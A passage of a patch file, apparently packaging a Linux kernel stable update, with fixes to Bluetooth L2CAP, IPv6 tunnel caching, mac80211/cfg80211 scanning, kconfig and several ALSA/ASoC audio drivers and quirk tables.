++	err = __hci_cmd_sync_status(hdev, opcode, plen, param, timeout);
++	hci_req_sync_unlock(hdev);
++
++	return err;
++}
++EXPORT_SYMBOL(hci_cmd_sync_status);
++
+ static void hci_cmd_sync_work(struct work_struct *work)
+ {
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev, cmd_sync_work);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a204488a21759..98dabbbe42938 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -7798,6 +7798,8 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 
+ 	BT_DBG("chan %p, len %d", chan, skb->len);
+ 
++	l2cap_chan_lock(chan);
++
+ 	if (chan->state != BT_BOUND && chan->state != BT_CONNECTED)
+ 		goto drop;
+ 
+@@ -7814,6 +7816,7 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 	}
+ 
+ drop:
++	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ free_skb:
+ 	kfree_skb(skb);
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index af6d4e3b8c065..b17782dc513b5 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1273,6 +1273,10 @@ static void l2cap_sock_kill(struct sock *sk)
+ 
+ 	BT_DBG("sk %p state %s", sk, state_to_string(sk->sk_state));
+ 
++	/* Sock is dead, so set chan data to NULL, avoid other task use invalid
++	 * sock pointer.
++	 */
++	l2cap_pi(sk)->chan->data = NULL;
+ 	/* Kill poor orphan */
+ 
+ 	l2cap_chan_put(l2cap_pi(sk)->chan);
+@@ -1515,12 +1519,16 @@ static struct l2cap_chan *l2cap_sock_new_connection_cb(struct l2cap_chan *chan)
+ 
+ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+-	struct sock *sk = chan->data;
+-	struct l2cap_pinfo *pi = l2cap_pi(sk);
++	struct sock *sk;
++	struct l2cap_pinfo *pi;
+ 	int err;
+ 
+-	lock_sock(sk);
++	sk = chan->data;
++	if (!sk)
++		return -ENXIO;
+ 
++	pi = l2cap_pi(sk);
++	lock_sock(sk);
+ 	if (chan->mode == L2CAP_MODE_ERTM && !list_empty(&pi->rx_busy)) {
+ 		err = -ENOMEM;
+ 		goto done;
+diff --git a/net/ipv6/ila/ila_lwt.c b/net/ipv6/ila/ila_lwt.c
+index 8c1ce78956bae..9d37f7164e732 100644
+--- a/net/ipv6/ila/ila_lwt.c
++++ b/net/ipv6/ila/ila_lwt.c
+@@ -58,7 +58,9 @@ static int ila_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 		return orig_dst->lwtstate->orig_output(net, sk, skb);
+ 	}
+ 
++	local_bh_disable();
+ 	dst = dst_cache_get(&ilwt->dst_cache);
++	local_bh_enable();
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *ip6h = ipv6_hdr(skb);
+ 		struct flowi6 fl6;
+@@ -86,8 +88,11 @@ static int ila_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 			goto drop;
+ 		}
+ 
+-		if (ilwt->connected)
++		if (ilwt->connected) {
++			local_bh_disable();
+ 			dst_cache_set_ip6(&ilwt->dst_cache, dst, &fl6.saddr);
++			local_bh_enable();
++		}
+ 	}
+ 
+ 	skb_dst_set(skb, dst);
+diff --git a/net/ipv6/rpl_iptunnel.c b/net/ipv6/rpl_iptunnel.c
+index ff691d9f4a04f..26adbe7f8a2f0 100644
+--- a/net/ipv6/rpl_iptunnel.c
++++ b/net/ipv6/rpl_iptunnel.c
+@@ -212,9 +212,9 @@ static int rpl_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 	if (unlikely(err))
+ 		goto drop;
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&rlwt->cache);
+-	preempt_enable();
++	local_bh_enable();
+ 
+ 	if (unlikely(!dst)) {
+ 		struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -234,9 +234,9 @@ static int rpl_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 			goto drop;
+ 		}
+ 
+-		preempt_disable();
++		local_bh_disable();
+ 		dst_cache_set_ip6(&rlwt->cache, dst, &fl6.saddr);
+-		preempt_enable();
++		local_bh_enable();
+ 	}
+ 
+ 	skb_dst_drop(skb);
+@@ -268,9 +268,8 @@ static int rpl_input(struct sk_buff *skb)
+ 		return err;
+ 	}
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&rlwt->cache);
+-	preempt_enable();
+ 
+ 	skb_dst_drop(skb);
+ 
+@@ -278,14 +277,13 @@ static int rpl_input(struct sk_buff *skb)
+ 		ip6_route_input(skb);
+ 		dst = skb_dst(skb);
+ 		if (!dst->error) {
+-			preempt_disable();
+ 			dst_cache_set_ip6(&rlwt->cache, dst,
+ 					  &ipv6_hdr(skb)->saddr);
+-			preempt_enable();
+ 		}
+ 	} else {
+ 		skb_dst_set(skb, dst);
+ 	}
++	local_bh_enable();
+ 
+ 	err = skb_cow_head(skb, LL_RESERVED_SPACE(dst->dev));
+ 	if (unlikely(err))
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 1e57027da2913..2c60fc165801c 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2838,8 +2838,9 @@ static int ieee80211_set_mcast_rate(struct wiphy *wiphy, struct net_device *dev,
+ 	memcpy(sdata->vif.bss_conf.mcast_rate, rate,
+ 	       sizeof(int) * NUM_NL80211_BANDS);
+ 
+-	ieee80211_link_info_change_notify(sdata, &sdata->deflink,
+-					  BSS_CHANGED_MCAST_RATE);
++	if (ieee80211_sdata_running(sdata))
++		ieee80211_link_info_change_notify(sdata, &sdata->deflink,
++						  BSS_CHANGED_MCAST_RATE);
+ 
+ 	return 0;
+ }
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 3e14d5c9aa1b4..0d8a9bb925384 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -1782,6 +1782,8 @@ void ieee80211_link_info_change_notify(struct ieee80211_sub_if_data *sdata,
+ void ieee80211_configure_filter(struct ieee80211_local *local);
+ u32 ieee80211_reset_erp_info(struct ieee80211_sub_if_data *sdata);
+ 
++void ieee80211_handle_queued_frames(struct ieee80211_local *local);
++
+ u64 ieee80211_mgmt_tx_cookie(struct ieee80211_local *local);
+ int ieee80211_attach_ack_skb(struct ieee80211_local *local, struct sk_buff *skb,
+ 			     u64 *cookie, gfp_t gfp);
+diff --git a/net/mac80211/main.c b/net/mac80211/main.c
+index 6faba47b7b0ea..1eec4e2eb74cc 100644
+--- a/net/mac80211/main.c
++++ b/net/mac80211/main.c
+@@ -300,9 +300,9 @@ u32 ieee80211_reset_erp_info(struct ieee80211_sub_if_data *sdata)
+ 	       BSS_CHANGED_ERP_SLOT;
+ }
+ 
+-static void ieee80211_tasklet_handler(struct tasklet_struct *t)
++/* context: requires softirqs disabled */
++void ieee80211_handle_queued_frames(struct ieee80211_local *local)
+ {
+-	struct ieee80211_local *local = from_tasklet(local, t, tasklet);
+ 	struct sk_buff *skb;
+ 
+ 	while ((skb = skb_dequeue(&local->skb_queue)) ||
+@@ -327,6 +327,13 @@ static void ieee80211_tasklet_handler(struct tasklet_struct *t)
+ 	}
+ }
+ 
++static void ieee80211_tasklet_handler(struct tasklet_struct *t)
++{
++	struct ieee80211_local *local = from_tasklet(local, t, tasklet);
++
++	ieee80211_handle_queued_frames(local);
++}
++
+ static void ieee80211_restart_work(struct work_struct *work)
+ {
+ 	struct ieee80211_local *local =
+diff --git a/net/mac80211/mesh.c b/net/mac80211/mesh.c
+index 5a99b8f6e465f..9c9b47d153c28 100644
+--- a/net/mac80211/mesh.c
++++ b/net/mac80211/mesh.c
+@@ -1625,6 +1625,7 @@ void ieee80211_mesh_init_sdata(struct ieee80211_sub_if_data *sdata)
+ 	ifmsh->last_preq = jiffies;
+ 	ifmsh->next_perr = jiffies;
+ 	ifmsh->csa_role = IEEE80211_MESH_CSA_ROLE_NONE;
++	ifmsh->nonpeer_pm = NL80211_MESH_POWER_ACTIVE;
+ 	/* Allocate all mesh structures when creating the first mesh interface. */
+ 	if (!mesh_allocated)
+ 		ieee80211s_init();
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index 933d02d7c1284..62c22ff329ad4 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -733,15 +733,21 @@ static int __ieee80211_start_scan(struct ieee80211_sub_if_data *sdata,
+ 			local->hw_scan_ies_bufsize *= n_bands;
+ 		}
+ 
+-		local->hw_scan_req = kmalloc(
+-				sizeof(*local->hw_scan_req) +
+-				req->n_channels * sizeof(req->channels[0]) +
+-				local->hw_scan_ies_bufsize, GFP_KERNEL);
++		local->hw_scan_req = kmalloc(struct_size(local->hw_scan_req,
++							 req.channels,
++							 req->n_channels) +
++					     local->hw_scan_ies_bufsize,
++					     GFP_KERNEL);
+ 		if (!local->hw_scan_req)
+ 			return -ENOMEM;
+ 
+ 		local->hw_scan_req->req.ssids = req->ssids;
+ 		local->hw_scan_req->req.n_ssids = req->n_ssids;
++		/* None of the channels are actually set
++		 * up but let UBSAN know the boundaries.
++		 */
++		local->hw_scan_req->req.n_channels = req->n_channels;
++
+ 		ies = (u8 *)local->hw_scan_req +
+ 			sizeof(*local->hw_scan_req) +
+ 			req->n_channels * sizeof(req->channels[0]);
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 1088d90e355ba..738f1f139a90e 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2207,6 +2207,10 @@ u32 ieee80211_sta_get_rates(struct ieee80211_sub_if_data *sdata,
+ 
+ void ieee80211_stop_device(struct ieee80211_local *local)
+ {
++	local_bh_disable();
++	ieee80211_handle_queued_frames(local);
++	local_bh_enable();
++
+ 	ieee80211_led_radio(local, false);
+ 	ieee80211_mod_tpt_led_trig(local, 0, IEEE80211_TPT_LEDTRIG_FL_RADIO);
+ 
+diff --git a/net/mac802154/tx.c b/net/mac802154/tx.c
+index c829e4a753256..7cea95d0b78f9 100644
+--- a/net/mac802154/tx.c
++++ b/net/mac802154/tx.c
+@@ -34,8 +34,8 @@ void ieee802154_xmit_worker(struct work_struct *work)
+ 	if (res)
+ 		goto err_tx;
+ 
+-	dev->stats.tx_packets++;
+-	dev->stats.tx_bytes += skb->len;
++	DEV_STATS_INC(dev, tx_packets);
++	DEV_STATS_ADD(dev, tx_bytes, skb->len);
+ 
+ 	ieee802154_xmit_complete(&local->hw, skb, false);
+ 
+@@ -86,8 +86,8 @@ ieee802154_tx(struct ieee802154_local *local, struct sk_buff *skb)
+ 			goto err_tx;
+ 		}
+ 
+-		dev->stats.tx_packets++;
+-		dev->stats.tx_bytes += len;
++		DEV_STATS_INC(dev, tx_packets);
++		DEV_STATS_ADD(dev, tx_bytes, len);
+ 	} else {
+ 		local->tx_skb = skb;
+ 		queue_work(local->workqueue, &local->tx_work);
+diff --git a/net/wireless/rdev-ops.h b/net/wireless/rdev-ops.h
+index ee853a14a02de..5f210686c4110 100644
+--- a/net/wireless/rdev-ops.h
++++ b/net/wireless/rdev-ops.h
+@@ -2,7 +2,7 @@
+ /*
+  * Portions of this file
+  * Copyright(c) 2016-2017 Intel Deutschland GmbH
+- * Copyright (C) 2018, 2021-2023 Intel Corporation
++ * Copyright (C) 2018, 2021-2024 Intel Corporation
+  */
+ #ifndef __CFG80211_RDEV_OPS
+ #define __CFG80211_RDEV_OPS
+@@ -446,6 +446,10 @@ static inline int rdev_scan(struct cfg80211_registered_device *rdev,
+ 			    struct cfg80211_scan_request *request)
+ {
+ 	int ret;
++
++	if (WARN_ON_ONCE(!request->n_ssids && request->ssids))
++		return -EINVAL;
++
+ 	trace_rdev_scan(&rdev->wiphy, request);
+ 	ret = rdev->ops->scan(&rdev->wiphy, request);
+ 	trace_rdev_return_int(&rdev->wiphy, ret);
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3ad4c1032c038..3cd162e53173b 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -778,6 +778,7 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 	LIST_HEAD(coloc_ap_list);
+ 	bool need_scan_psc = true;
+ 	const struct ieee80211_sband_iftype_data *iftd;
++	size_t size, offs_ssids, offs_6ghz_params, offs_ies;
+ 
+ 	rdev_req->scan_6ghz = true;
+ 
+@@ -806,10 +807,15 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 		spin_unlock_bh(&rdev->bss_lock);
+ 	}
+ 
+-	request = kzalloc(struct_size(request, channels, n_channels) +
+-			  sizeof(*request->scan_6ghz_params) * count +
+-			  sizeof(*request->ssids) * rdev_req->n_ssids,
+-			  GFP_KERNEL);
++	size = struct_size(request, channels, n_channels);
++	offs_ssids = size;
++	size += sizeof(*request->ssids) * rdev_req->n_ssids;
++	offs_6ghz_params = size;
++	size += sizeof(*request->scan_6ghz_params) * count;
++	offs_ies = size;
++	size += rdev_req->ie_len;
++
++	request = kzalloc(size, GFP_KERNEL);
+ 	if (!request) {
+ 		cfg80211_free_coloc_ap_list(&coloc_ap_list);
+ 		return -ENOMEM;
+@@ -817,8 +823,26 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 
+ 	*request = *rdev_req;
+ 	request->n_channels = 0;
+-	request->scan_6ghz_params =
+-		(void *)&request->channels[n_channels];
++	request->n_6ghz_params = 0;
++	if (rdev_req->n_ssids) {
++		/*
++		 * Add the ssids from the parent scan request to the new
++		 * scan request, so the driver would be able to use them
++		 * in its probe requests to discover hidden APs on PSC
++		 * channels.
++		 */
++		request->ssids = (void *)request + offs_ssids;
++		memcpy(request->ssids, rdev_req->ssids,
++		       sizeof(*request->ssids) * request->n_ssids);
++	}
++	request->scan_6ghz_params = (void *)request + offs_6ghz_params;
++
++	if (rdev_req->ie_len) {
++		void *ie = (void *)request + offs_ies;
++
++		memcpy(ie, rdev_req->ie, rdev_req->ie_len);
++		request->ie = ie;
++	}
+ 
+ 	/*
+ 	 * PSC channels should not be scanned in case of direct scan with 1 SSID
+@@ -906,17 +930,8 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 
+ 	if (request->n_channels) {
+ 		struct cfg80211_scan_request *old = rdev->int_scan_req;
+-		rdev->int_scan_req = request;
+ 
+-		/*
+-		 * Add the ssids from the parent scan request to the new scan
+-		 * request, so the driver would be able to use them in its
+-		 * probe requests to discover hidden APs on PSC channels.
+-		 */
+-		request->ssids = (void *)&request->channels[request->n_channels];
+-		request->n_ssids = rdev_req->n_ssids;
+-		memcpy(request->ssids, rdev_req->ssids, sizeof(*request->ssids) *
+-		       request->n_ssids);
++		rdev->int_scan_req = request;
+ 
+ 		/*
+ 		 * If this scan follows a previous scan, save the scan start
+@@ -2704,10 +2719,14 @@ int cfg80211_wext_siwscan(struct net_device *dev,
+ 	wiphy = &rdev->wiphy;
+ 
+ 	/* Determine number of channels, needed to allocate creq */
+-	if (wreq && wreq->num_channels)
++	if (wreq && wreq->num_channels) {
++		/* Passed from userspace so should be checked */
++		if (unlikely(wreq->num_channels > IW_MAX_FREQUENCIES))
++			return -EINVAL;
+ 		n_channels = wreq->num_channels;
+-	else
++	} else {
+ 		n_channels = ieee80211_get_num_supported_channels(wiphy);
++	}
+ 
+ 	creq = kzalloc(sizeof(*creq) + sizeof(struct cfg80211_ssid) +
+ 		       n_channels * sizeof(void *),
+@@ -2781,8 +2800,10 @@ int cfg80211_wext_siwscan(struct net_device *dev,
+ 			memcpy(creq->ssids[0].ssid, wreq->essid, wreq->essid_len);
+ 			creq->ssids[0].ssid_len = wreq->essid_len;
+ 		}
+-		if (wreq->scan_type == IW_SCAN_TYPE_PASSIVE)
++		if (wreq->scan_type == IW_SCAN_TYPE_PASSIVE) {
++			creq->ssids = NULL;
+ 			creq->n_ssids = 0;
++		}
+ 	}
+ 
+ 	for (i = 0; i < NUM_NL80211_BANDS; i++)
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 84c730da36dd3..1ae39b9f4a95e 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
+ #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
+ #endif
+ 
++#if BUILDING_GCC_VERSION >= 14000
++#define last_stmt(x)			last_nondebug_stmt(x)
++#endif
++
+ #endif
+diff --git a/scripts/kconfig/expr.c b/scripts/kconfig/expr.c
+index 81ebf8108ca74..81dfdf4470f75 100644
+--- a/scripts/kconfig/expr.c
++++ b/scripts/kconfig/expr.c
+@@ -396,35 +396,6 @@ static struct expr *expr_eliminate_yn(struct expr *e)
+ 	return e;
+ }
+ 
+-/*
+- * bool FOO!=n => FOO
+- */
+-struct expr *expr_trans_bool(struct expr *e)
+-{
+-	if (!e)
+-		return NULL;
+-	switch (e->type) {
+-	case E_AND:
+-	case E_OR:
+-	case E_NOT:
+-		e->left.expr = expr_trans_bool(e->left.expr);
+-		e->right.expr = expr_trans_bool(e->right.expr);
+-		break;
+-	case E_UNEQUAL:
+-		// FOO!=n -> FOO
+-		if (e->left.sym->type == S_TRISTATE) {
+-			if (e->right.sym == &symbol_no) {
+-				e->type = E_SYMBOL;
+-				e->right.sym = NULL;
+-			}
+-		}
+-		break;
+-	default:
+-		;
+-	}
+-	return e;
+-}
+-
+ /*
+  * e1 || e2 -> ?
+  */
+diff --git a/scripts/kconfig/expr.h b/scripts/kconfig/expr.h
+index 9c9caca5bd5f2..c91060e19e477 100644
+--- a/scripts/kconfig/expr.h
++++ b/scripts/kconfig/expr.h
+@@ -296,7 +296,6 @@ void expr_free(struct expr *e);
+ void expr_eliminate_eq(struct expr **ep1, struct expr **ep2);
+ int expr_eq(struct expr *e1, struct expr *e2);
+ tristate expr_calc_value(struct expr *e);
+-struct expr *expr_trans_bool(struct expr *e);
+ struct expr *expr_eliminate_dups(struct expr *e);
+ struct expr *expr_transform(struct expr *e);
+ int expr_contains_symbol(struct expr *dep, struct symbol *sym);
+diff --git a/scripts/kconfig/gconf.c b/scripts/kconfig/gconf.c
+index 17adabfd6e6bf..5d1404178e482 100644
+--- a/scripts/kconfig/gconf.c
++++ b/scripts/kconfig/gconf.c
+@@ -1481,7 +1481,6 @@ int main(int ac, char *av[])
+ 
+ 	conf_parse(name);
+ 	fixup_rootmenu(&rootmenu);
+-	conf_read(NULL);
+ 
+ 	/* Load the interface and connect signals */
+ 	init_main_window(glade_file);
+@@ -1489,6 +1488,8 @@ int main(int ac, char *av[])
+ 	init_left_tree();
+ 	init_right_tree();
+ 
++	conf_read(NULL);
++
+ 	switch (view_mode) {
+ 	case SINGLE_VIEW:
+ 		display_tree_part();
+diff --git a/scripts/kconfig/menu.c b/scripts/kconfig/menu.c
+index 109325f31bef3..9d4c3f366a061 100644
+--- a/scripts/kconfig/menu.c
++++ b/scripts/kconfig/menu.c
+@@ -380,8 +380,6 @@ void menu_finalize(struct menu *parent)
+ 				dep = expr_transform(dep);
+ 				dep = expr_alloc_and(expr_copy(basedep), dep);
+ 				dep = expr_eliminate_dups(dep);
+-				if (menu->sym && menu->sym->type != S_TRISTATE)
+-					dep = expr_trans_bool(dep);
+ 				prop->visible.expr = dep;
+ 
+ 				/*
+diff --git a/sound/core/pcm_dmaengine.c b/sound/core/pcm_dmaengine.c
+index 494ec0c207fad..e299e8634751f 100644
+--- a/sound/core/pcm_dmaengine.c
++++ b/sound/core/pcm_dmaengine.c
+@@ -349,6 +349,16 @@ int snd_dmaengine_pcm_open_request_chan(struct snd_pcm_substream *substream,
+ }
+ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ 
++int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream)
++{
++	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++
++	dmaengine_synchronize(prtd->dma_chan);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_sync_stop);
++
+ /**
+  * snd_dmaengine_pcm_close - Close a dmaengine based PCM substream
+  * @substream: PCM substream
+@@ -358,6 +368,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ int snd_dmaengine_pcm_close(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
++
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status == DMA_PAUSED)
++		dmaengine_terminate_async(prtd->dma_chan);
+ 
+ 	dmaengine_synchronize(prtd->dma_chan);
+ 	kfree(prtd);
+@@ -378,6 +394,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_close);
+ int snd_dmaengine_pcm_close_release_chan(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
++
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status == DMA_PAUSED)
++		dmaengine_terminate_async(prtd->dma_chan);
+ 
+ 	dmaengine_synchronize(prtd->dma_chan);
+ 	dma_release_channel(prtd->dma_chan);
+diff --git a/sound/core/pcm_native.c b/sound/core/pcm_native.c
+index 9238abbfb2d62..2b73518e5e314 100644
+--- a/sound/core/pcm_native.c
++++ b/sound/core/pcm_native.c
+@@ -1781,6 +1781,8 @@ static int snd_pcm_pre_resume(struct snd_pcm_substream *substream,
+ 			      snd_pcm_state_t state)
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
++	if (runtime->state != SNDRV_PCM_STATE_SUSPENDED)
++		return -EBADFD;
+ 	if (!(runtime->info & SNDRV_PCM_INFO_RESUME))
+ 		return -ENOSYS;
+ 	runtime->trigger_master = substream;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 06f00819d1a8a..66b8adb2069af 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -583,10 +583,14 @@ static void alc_shutup_pins(struct hda_codec *codec)
+ 	switch (codec->core.vendor_id) {
+ 	case 0x10ec0236:
+ 	case 0x10ec0256:
++	case 0x10ec0257:
+ 	case 0x19e58326:
+ 	case 0x10ec0283:
++	case 0x10ec0285:
+ 	case 0x10ec0286:
++	case 0x10ec0287:
+ 	case 0x10ec0288:
++	case 0x10ec0295:
+ 	case 0x10ec0298:
+ 		alc_headset_mic_no_shutup(codec);
+ 		break;
+@@ -9697,6 +9701,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8788, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87b7, "HP Laptop 14-fq0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87c8, "HP", ALC287_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x87d3, "HP Laptop 15-gw0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87e5, "HP ProBook 440 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e7, "HP ProBook 450 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f1, "HP ProBook 630 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 0568e64d10150..8e3eccb4faa72 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -283,6 +283,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M5402RA"),
+ 		}
+ 	},
++        {
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M5602RA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index d6ef8e850412b..ff879e173d51d 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -610,6 +610,17 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "ARCHOS 101 CESIUM"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_JD_NOT_INV |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
+diff --git a/sound/soc/soc-generic-dmaengine-pcm.c b/sound/soc/soc-generic-dmaengine-pcm.c
+index 3b99f619e37eb..bece8927b056c 100644
+--- a/sound/soc/soc-generic-dmaengine-pcm.c
++++ b/sound/soc/soc-generic-dmaengine-pcm.c
+@@ -318,6 +318,12 @@ static int dmaengine_copy_user(struct snd_soc_component *component,
+ 	return 0;
+ }
+ 
++static int dmaengine_pcm_sync_stop(struct snd_soc_component *component,
++				   struct snd_pcm_substream *substream)
++{
++	return snd_dmaengine_pcm_sync_stop(substream);
++}
++
+ static const struct snd_soc_component_driver dmaengine_pcm_component = {
+ 	.name		= SND_DMAENGINE_PCM_DRV_NAME,
+ 	.probe_order	= SND_SOC_COMP_ORDER_LATE,
+@@ -327,6 +333,7 @@ static const struct snd_soc_component_driver dmaengine_pcm_component = {
+ 	.trigger	= dmaengine_pcm_trigger,
+ 	.pointer	= dmaengine_pcm_pointer,
+ 	.pcm_construct	= dmaengine_pcm_new,
++	.sync_stop	= dmaengine_pcm_sync_stop,
+ };
+ 
+ static const struct snd_soc_component_driver dmaengine_pcm_component_process = {
+@@ -339,6 +346,7 @@ static const struct snd_soc_component_driver dmaengine_pcm_component_process = {
+ 	.pointer	= dmaengine_pcm_pointer,
+ 	.copy_user	= dmaengine_copy_user,
+ 	.pcm_construct	= dmaengine_pcm_new,
++	.sync_stop	= dmaengine_pcm_sync_stop,
+ };
+ 
+ static const char * const dmaengine_pcm_dma_channel_names[] = {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index d68c48555a7e3..d3cbfa6a704f9 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1101,15 +1101,28 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 			break;
+ 		}
+ 
+-		route->source = elem->source;
+-		route->sink = elem->sink;
++		route->source = devm_kmemdup(tplg->dev, elem->source,
++					     min(strlen(elem->source),
++						 SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++					     GFP_KERNEL);
++		route->sink = devm_kmemdup(tplg->dev, elem->sink,
++					   min(strlen(elem->sink), SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++					   GFP_KERNEL);
++		if (!route->source || !route->sink) {
++			ret = -ENOMEM;
++			break;
++		}
+ 
+-		/* set to NULL atm for tplg users */
+-		route->connected = NULL;
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) == 0)
+-			route->control = NULL;
+-		else
+-			route->control = elem->control;
++		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) != 0) {
++			route->control = devm_kmemdup(tplg->dev, elem->control,
++						      min(strlen(elem->control),
++							  SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++						      GFP_KERNEL);
++			if (!route->control) {
++				ret = -ENOMEM;
++				break;
++			}
++		}
+ 
+ 		/* add route dobj to dobj_list */
+ 		route->dobj.type = SND_SOC_DOBJ_GRAPH;
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 061ab7289a6c3..b1141f4478168 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -328,7 +328,7 @@ sof_prepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget
+ 			if (ret < 0) {
+ 				/* unprepare the source widget */
+ 				if (widget_ops[widget->id].ipc_unprepare &&
+-				    swidget && swidget->prepared) {
++				    swidget && swidget->prepared && swidget->use_count == 0) {
+ 					widget_ops[widget->id].ipc_unprepare(swidget);
+ 					swidget->prepared = false;
+ 				}
+diff --git a/sound/soc/ti/davinci-mcasp.c b/sound/soc/ti/davinci-mcasp.c
+index 4edf5b27e136b..c6ef8f92b25f1 100644
+--- a/sound/soc/ti/davinci-mcasp.c
++++ b/sound/soc/ti/davinci-mcasp.c
